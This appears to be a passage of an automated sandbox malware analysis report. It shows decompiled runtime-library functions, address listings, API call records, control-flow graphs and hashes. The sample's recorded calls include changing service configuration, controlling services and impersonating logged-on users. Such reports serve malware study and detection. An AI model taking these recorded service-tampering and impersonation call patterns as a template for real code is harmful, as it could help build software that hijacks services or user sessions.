                                                          								_t54 = E0040BFC1(__eflags);
                                                          								 *_t54 = 0x2a;
                                                          								__eflags = _v8;
                                                          								if(_v8 != 0) {
                                                          									_t54 = _v12;
                                                          									_t33 = _t54 + 0x70;
                                                          									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                          									__eflags =  *_t33;
                                                          								}
                                                          								return _t54 | 0xffffffff;
                                                          							}
                                                          							_t56 = _v20;
                                                          							_t65 =  *(_t56 + 0xac);
                                                          							__eflags = _t65 - 1;
                                                          							if(_t65 <= 1) {
                                                          								L17:
                                                          								__eflags = _a12 -  *(_t56 + 0xac);
                                                          								if(__eflags < 0) {
                                                          									goto L21;
                                                          								}
                                                          								__eflags = _t72[1];
                                                          								if(__eflags == 0) {
                                                          									goto L21;
                                                          								}
                                                          								L19:
                                                          								_t57 =  *(_t56 + 0xac);
                                                          								__eflags = _v8;
                                                          								if(_v8 == 0) {
                                                          									return _t57;
                                                          								}
                                                          								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                          								return _t57;
                                                          							}
                                                          							__eflags = _a12 - _t65;
                                                          							if(_a12 < _t65) {
                                                          								goto L17;
                                                          							}
                                                          							__eflags = _a4;
                                                          							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                          							__eflags = _t58;
                                                          							_t56 = _v20;
                                                          							if(_t58 != 0) {
                                                          								goto L19;
                                                          							}
                                                          							goto L17;
                                                          						}
                                                          						_t59 = _a4;
                                                          						__eflags = _t59;
                                                          						if(_t59 != 0) {
                                                          							 *_t59 =  *_t72 & 0x000000ff;
                                                          						}
                                                          						goto L10;
                                                          					} else {
                                                          						_t60 = _a4;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 = 0;
                                                          						}
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          			}

















                                                          0x004152a9
                                                          0x004152b0
                                                          0x004152c7
                                                          0x00000000
                                                          0x004152b7
                                                          0x004152b9
                                                          0x004152d3
                                                          0x004152d8
                                                          0x004152db
                                                          0x004152de
                                                          0x00415307
                                                          0x0041530e
                                                          0x00415310
                                                          0x00415391
                                                          0x004153ac
                                                          0x004153ae
                                                          0x004152ee
                                                          0x004152ee
                                                          0x004152f1
                                                          0x004152f3
                                                          0x004152f6
                                                          0x004152f6
                                                          0x004152f6
                                                          0x004152f6
                                                          0x00000000
                                                          0x004152fc
                                                          0x00415370
                                                          0x00415370
                                                          0x00415375
                                                          0x0041537b
                                                          0x0041537e
                                                          0x00415380
                                                          0x00415383
                                                          0x00415383
                                                          0x00415383
                                                          0x00415383
                                                          0x00000000
                                                          0x00415387
                                                          0x00415312
                                                          0x00415315
                                                          0x0041531b
                                                          0x0041531e
                                                          0x00415345
                                                          0x00415348
                                                          0x0041534e
                                                          0x00000000
                                                          0x00000000
                                                          0x00415350
                                                          0x00415353
                                                          0x00000000
                                                          0x00000000
                                                          0x00415355
                                                          0x00415355
                                                          0x0041535b
                                                          0x0041535e
                                                          0x004152cc
                                                          0x004152cc
                                                          0x00415367
                                                          0x00000000
                                                          0x00415367
                                                          0x00415320
                                                          0x00415323
                                                          0x00000000
                                                          0x00000000
                                                          0x00415327
                                                          0x00415338
                                                          0x0041533e
                                                          0x00415340
                                                          0x00415343
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00415343
                                                          0x004152e0
                                                          0x004152e3
                                                          0x004152e5
                                                          0x004152eb
                                                          0x004152eb
                                                          0x00000000
                                                          0x004152bb
                                                          0x004152bb
                                                          0x004152c0
                                                          0x004152c4
                                                          0x004152c4
                                                          0x00000000
                                                          0x004152c0
                                                          0x004152b9

                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                          • __isleadbyte_l.LIBCMT ref: 00415307
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                          • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                          • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01FD553A
                                                          • __isleadbyte_l.LIBCMT ref: 01FD556E
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 01FD559F
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 01FD560D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                          • Instruction ID: 3d5a46b13f73afe8716d6c18539e01b93c3ca0b3da3816334ac2bb9cac90411c
                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                          • Instruction Fuzzy Hash: D331B131A10246EFEB22DF68C880BBE3FB7AF41215B9C4569E565CB1B1E732D940DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                          				intOrPtr _t25;
                                                          				void* _t26;
                                                          				void* _t28;
                                                          
                                                          				_t25 = _a16;
                                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                                          					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          					goto L9;
                                                          				} else {
                                                          					_t34 = _t25 - 0x66;
                                                          					if(_t25 != 0x66) {
                                                          						__eflags = _t25 - 0x61;
                                                          						if(_t25 == 0x61) {
                                                          							L7:
                                                          							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          						} else {
                                                          							__eflags = _t25 - 0x41;
                                                          							if(__eflags == 0) {
                                                          								goto L7;
                                                          							} else {
                                                          								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          							}
                                                          						}
                                                          						L9:
                                                          						return _t26;
                                                          					} else {
                                                          						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                          					}
                                                          				}
                                                          			}






                                                          0x004134e0
                                                          0x004134e6
                                                          0x00413559
                                                          0x00000000
                                                          0x004134ed
                                                          0x004134ed
                                                          0x004134f0
                                                          0x0041350b
                                                          0x0041350e
                                                          0x0041352e
                                                          0x00413540
                                                          0x00413510
                                                          0x00413510
                                                          0x00413513
                                                          0x00000000
                                                          0x00413515
                                                          0x00413527
                                                          0x00413527
                                                          0x00413513
                                                          0x0041355e
                                                          0x00413562
                                                          0x004134f2
                                                          0x0041350a
                                                          0x0041350a
                                                          0x004134f0

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction ID: 67c3a6b89fe31dd52e740921048ca5d8080046b149df682d46f967dd7992004a
                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction Fuzzy Hash: A21148B240454AFBCF125E89CC45CEE3F67BB18254B4A8515FB2859130E237C9B1AB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:51%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:9.4%
                                                          Total number of Nodes:32
                                                          Total number of Limit Nodes:2

                                                          Callgraph

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 8ba8f8a90636b61cc49ca103cc1e88f6881706b7a8cfd4710523ed54392684f3
                                                          • Instruction ID: eec6579fbb36b79c797f2c171ddd045b29b887274024a064feea452c5ab0d7d5
                                                          • Opcode Fuzzy Hash: 8ba8f8a90636b61cc49ca103cc1e88f6881706b7a8cfd4710523ed54392684f3
                                                          • Instruction Fuzzy Hash: 0C918330618A4D8FEB68DF28D8967E977E1FF59310F00812ED84EC7291CB75A545CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 17 7ff9a7931b10-7ff9a7931b17 18 7ff9a7931b19-7ff9a7931b21 17->18 19 7ff9a7931b22-7ff9a7931bd8 17->19 18->19 23 7ff9a7931bda-7ff9a7931be9 19->23 24 7ff9a7931c36-7ff9a7931c68 19->24 23->24 25 7ff9a7931beb-7ff9a7931bee 23->25 31 7ff9a7931c6a-7ff9a7931c7a 24->31 32 7ff9a7931cc7-7ff9a7931d00 24->32 26 7ff9a7931bf0-7ff9a7931c03 25->26 27 7ff9a7931c28-7ff9a7931c30 25->27 29 7ff9a7931c07-7ff9a7931c1a 26->29 30 7ff9a7931c05 26->30 27->24 29->29 33 7ff9a7931c1c-7ff9a7931c24 29->33 30->29 31->32 34 7ff9a7931c7c-7ff9a7931c7f 31->34 38 7ff9a7931d5e-7ff9a7931d97 32->38 39 7ff9a7931d02-7ff9a7931d11 32->39 33->27 36 7ff9a7931cb9-7ff9a7931cc1 34->36 37 7ff9a7931c81-7ff9a7931c94 34->37 36->32 40 7ff9a7931c98-7ff9a7931cab 37->40 41 7ff9a7931c96 37->41 49 7ff9a7931d99-7ff9a7931da9 38->49 50 7ff9a7931df6-7ff9a7931e2f 38->50 39->38 42 7ff9a7931d13-7ff9a7931d16 39->42 40->40 43 7ff9a7931cad-7ff9a7931cb5 40->43 41->40 44 7ff9a7931d50-7ff9a7931d58 42->44 45 7ff9a7931d18-7ff9a7931d2b 42->45 43->36 44->38 47 7ff9a7931d2f-7ff9a7931d42 45->47 48 7ff9a7931d2d 45->48 47->47 51 7ff9a7931d44-7ff9a7931d4c 47->51 48->47 49->50 52 7ff9a7931dab-7ff9a7931dae 49->52 58 7ff9a7931e8e-7ff9a7931ec7 50->58 59 7ff9a7931e31-7ff9a7931e41 50->59 51->44 53 7ff9a7931db0-7ff9a7931dc3 52->53 54 7ff9a7931de8-7ff9a7931df0 52->54 56 7ff9a7931dc7-7ff9a7931dda 53->56 57 7ff9a7931dc5 53->57 54->50 56->56 60 7ff9a7931ddc-7ff9a7931de4 56->60 57->56 65 7ff9a7931ec9-7ff9a7931ed9 58->65 66 7ff9a7931f26-7ff9a7931fe2 ChangeServiceConfigA 58->66 59->58 61 7ff9a7931e43-7ff9a7931e46 59->61 60->54 63 7ff9a7931e80-7ff9a7931e88 61->63 64 7ff9a7931e48-7ff9a7931e5b 61->64 63->58 67 7ff9a7931e5f-7ff9a7931e72 64->67 68 7ff9a7931e5d 64->68 65->66 69 7ff9a7931edb-7ff9a7931ede 65->69 76 7ff9a7931fea-7ff9a7931ffc call 7ff9a7932049 66->76 77 7ff9a7931fe4 66->77 67->67 70 7ff9a7931e74-7ff9a7931e7c 67->70 68->67 71 7ff9a7931ee0-7ff9a7931ef3 69->71 72 7ff9a7931f18-7ff9a7931f20 69->72 70->63 74 7ff9a7931ef7-7ff9a7931f0a 71->74 75 7ff9a7931ef5 71->75 72->66 74->74 78 7ff9a7931f0c-7ff9a7931f14 74->78 75->74 80 7ff9a7932001-7ff9a7932048 76->80 77->76 78->72
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: ChangeConfigService
                                                          • String ID:
                                                          • API String ID: 3849694230-0
                                                          • Opcode ID: 4297f51b53212a0ca5520eb7991db2334747a913117e31b369c22962d773a8a3
                                                          • Instruction ID: 23e00aa7ce553c015cceb36d8c9113a51cd733b51c9785730a3f002b95709590
                                                          • Opcode Fuzzy Hash: 4297f51b53212a0ca5520eb7991db2334747a913117e31b369c22962d773a8a3
                                                          • Instruction Fuzzy Hash: 87F18130918E4E4BEB68DF28D8477F977D1FB59310F10426EE89EC7291DB74A5818B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 114 7ff9a7930c34-7ff9a7930c3b 115 7ff9a7930c3d-7ff9a7930c45 114->115 116 7ff9a7930c46-7ff9a7930ce5 114->116 115->116 120 7ff9a7930d40-7ff9a7930daa OpenServiceA 116->120 121 7ff9a7930ce7-7ff9a7930cf6 116->121 128 7ff9a7930dac 120->128 129 7ff9a7930db2-7ff9a7930e01 call 7ff9a7930e02 120->129 121->120 122 7ff9a7930cf8-7ff9a7930cfb 121->122 123 7ff9a7930cfd-7ff9a7930d10 122->123 124 7ff9a7930d35-7ff9a7930d3d 122->124 126 7ff9a7930d14-7ff9a7930d27 123->126 127 7ff9a7930d12 123->127 124->120 126->126 131 7ff9a7930d29-7ff9a7930d31 126->131 127->126 128->129 131->124
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: OpenService
                                                          • String ID:
                                                          • API String ID: 3098006287-0
                                                          • Opcode ID: 5a7edfe3b2d329facd973b8de39b5dab7d5cf723b5ed58cef1dff195b6f24ed3
                                                          • Instruction ID: 9750408e3842ae0acf3e0994fbe53cfd34783e282cbc8a29a2acd833e68d35af
                                                          • Opcode Fuzzy Hash: 5a7edfe3b2d329facd973b8de39b5dab7d5cf723b5ed58cef1dff195b6f24ed3
                                                          • Instruction Fuzzy Hash: D8519430518A4D4FEB58EF2CD8567E977E1FB59310F10422EE89EC3292DB74E8418B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 134 7ff9a7930b2d-7ff9a7930bb8 139 7ff9a7930bba-7ff9a7930bbf 134->139 140 7ff9a7930bc2-7ff9a7930bc7 134->140 139->140 141 7ff9a7930bc9-7ff9a7930bce 140->141 142 7ff9a7930bd1-7ff9a7930c08 OpenSCManagerW 140->142 141->142 143 7ff9a7930c0a 142->143 144 7ff9a7930c10-7ff9a7930c2d 142->144 143->144
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: ManagerOpen
                                                          • String ID:
                                                          • API String ID: 1889721586-0
                                                          • Opcode ID: 7c0cff6b2761b17cef5bcba566fa3f9db8269b4a5b552e9697c61edd32cf2776
                                                          • Instruction ID: e24f7de1b57dd4186b8d00f91a6b2a594d2f0adf15ff51cbf92a9a0839b794ab
                                                          • Opcode Fuzzy Hash: 7c0cff6b2761b17cef5bcba566fa3f9db8269b4a5b552e9697c61edd32cf2776
                                                          • Instruction Fuzzy Hash: 6F31903190DA588FDB28DF9C984A7FABBF1EB65311F00416FD08ED3652CA7064458B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 145 7ff9a7931a1d-7ff9a7931a25 146 7ff9a7931a27 145->146 147 7ff9a7931a28-7ff9a7931ad9 ControlService 145->147 146->147 151 7ff9a7931adb 147->151 152 7ff9a7931ae1-7ff9a7931b09 147->152 151->152
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: ControlService
                                                          • String ID:
                                                          • API String ID: 253159669-0
                                                          • Opcode ID: 3ac947d5817dfa0f7827f7aa03df02ed8f2838772595e49d25895c9180769122
                                                          • Instruction ID: 85b334fe72e00f4761d8ca6c3ebda02736845073e8dd1285b0a1e1bffef2b473
                                                          • Opcode Fuzzy Hash: 3ac947d5817dfa0f7827f7aa03df02ed8f2838772595e49d25895c9180769122
                                                          • Instruction Fuzzy Hash: 4731C43190CA588FDB18DF9C9846AF97BF0EF65711F04416FE08AD3252CB74A846CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 153 7ff9a793108a-7ff9a79310b3 154 7ff9a79310be-7ff9a7931152 FindCloseChangeNotification 153->154 155 7ff9a79310b5-7ff9a79310bd 153->155 158 7ff9a793115a-7ff9a7931181 154->158 159 7ff9a7931154 154->159 155->154 159->158
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: a138aa13b9b56cf9bb3108c83ad0dc18485a32de622eb9e358447c22b303c839
                                                          • Instruction ID: 532cb4cc4a7f25c5829ac744eb27d6ccd8890814863dc70dcb7dd2052e99eb8a
                                                          • Opcode Fuzzy Hash: a138aa13b9b56cf9bb3108c83ad0dc18485a32de622eb9e358447c22b303c839
                                                          • Instruction Fuzzy Hash: D831D63090D7885FDB0ADB6898157E97FF0EF57320F04429FD089C71A2DBA56456CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 160 7ff9a7931760-7ff9a7931767 161 7ff9a7931769-7ff9a7931771 160->161 162 7ff9a7931772-7ff9a79317c5 160->162 161->162 165 7ff9a79317cd-7ff9a7931802 ImpersonateLoggedOnUser 162->165 166 7ff9a793180a-7ff9a7931831 165->166 167 7ff9a7931804 165->167 167->166
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: ImpersonateLoggedUser
                                                          • String ID:
                                                          • API String ID: 2216092060-0
                                                          • Opcode ID: 4d29ff7b72da00a2c6a6f33e0467aaea3310249e0e7267cf9948bc3944b57785
                                                          • Instruction ID: 153fbed3ac0307f06a07200e90bcfa310690d8f7d0889a5791ab18a00cf5736e
                                                          • Opcode Fuzzy Hash: 4d29ff7b72da00a2c6a6f33e0467aaea3310249e0e7267cf9948bc3944b57785
                                                          • Instruction Fuzzy Hash: CE31F63190CA4C8FDB58DF68D845BF97BE0EB56321F00422FD049C31A2CB74A856CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 168 7ff9a7930108-7ff9a7930114 170 7ff9a793012b-7ff9a7931802 ImpersonateLoggedOnUser 168->170 171 7ff9a7930116 168->171 175 7ff9a793180a-7ff9a7931831 170->175 176 7ff9a7931804 170->176 171->170 176->175
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d3d8691a59116603c1586729954ce7bcad1815fa7e5436332f2a65a8d8ee548
                                                          • Instruction ID: 4e9d696c927cf9fd961306903d4266b6ec7cde34440493068d6de3b545feb727
                                                          • Opcode Fuzzy Hash: 7d3d8691a59116603c1586729954ce7bcad1815fa7e5436332f2a65a8d8ee548
                                                          • Instruction Fuzzy Hash: 5921E031A0CA0D8FDB48DF589806BF9BBE1EBA5321F00422FD04DC3192DB64A8068B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 351 18a9a1-18a9ae call 18cfb2 354 18a9d0-18a9dc call 18a9e3 ExitProcess 351->354 355 18a9b0-18a9be GetPEB 351->355 355->354 357 18a9c0-18a9ca GetCurrentProcess TerminateProcess 355->357 357->354
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0018E000,?,0018A9A0,0018AF26,?,0018E000,0018AF26,0018E000), ref: 0018A9C3
                                                          • TerminateProcess.KERNEL32(00000000,?,0018A9A0,0018AF26,?,0018E000,0018AF26,0018E000), ref: 0018A9CA
                                                          • ExitProcess.KERNEL32 ref: 0018A9DC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 1b024833e7244657decd7ac09ecfebfa93916e056fe8f34cc67b30163edb5a73
                                                          • Instruction ID: 03be8be29561b91a70d64ce4001187aaa614732d7e304241bfe8c4afd989357c
                                                          • Opcode Fuzzy Hash: 1b024833e7244657decd7ac09ecfebfa93916e056fe8f34cc67b30163edb5a73
                                                          • Instruction Fuzzy Hash: 58E04631400108ABDB11BB14CC09A193BA9EF10341F454426F90586531CB39EEC1DFD2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00017A80,00187776), ref: 00187A79
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: fe3e96edd6a6420ae8ea5edb4088e753725546aa623a77847e0a63063d70bc99
                                                          • Instruction ID: a8964a2ab33e06f386c7dee9809a4accc53a58c88bdb4f4ec732988a060f078f
                                                          • Opcode Fuzzy Hash: fe3e96edd6a6420ae8ea5edb4088e753725546aa623a77847e0a63063d70bc99
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(001A9708,00000FA0,?,?,00187028), ref: 00187056
                                                          • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,00187028), ref: 00187061
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00187028), ref: 00187072
                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00187084
                                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00187092
                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00187028), ref: 001870B5
                                                          • ___scrt_fastfail.LIBCMT ref: 001870C6
                                                          • DeleteCriticalSection.KERNEL32(001A9708,00000007,?,?,00187028), ref: 001870D1
                                                          • CloseHandle.KERNEL32(00000000,?,?,00187028), ref: 001870E1
                                                          Strings
                                                          • WakeAllConditionVariable, xrefs: 0018708A
                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0018705C
                                                          • kernel32.dll, xrefs: 0018706D
                                                          • SleepConditionVariableCS, xrefs: 0018707E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                          • API String ID: 3578986977-3242537097
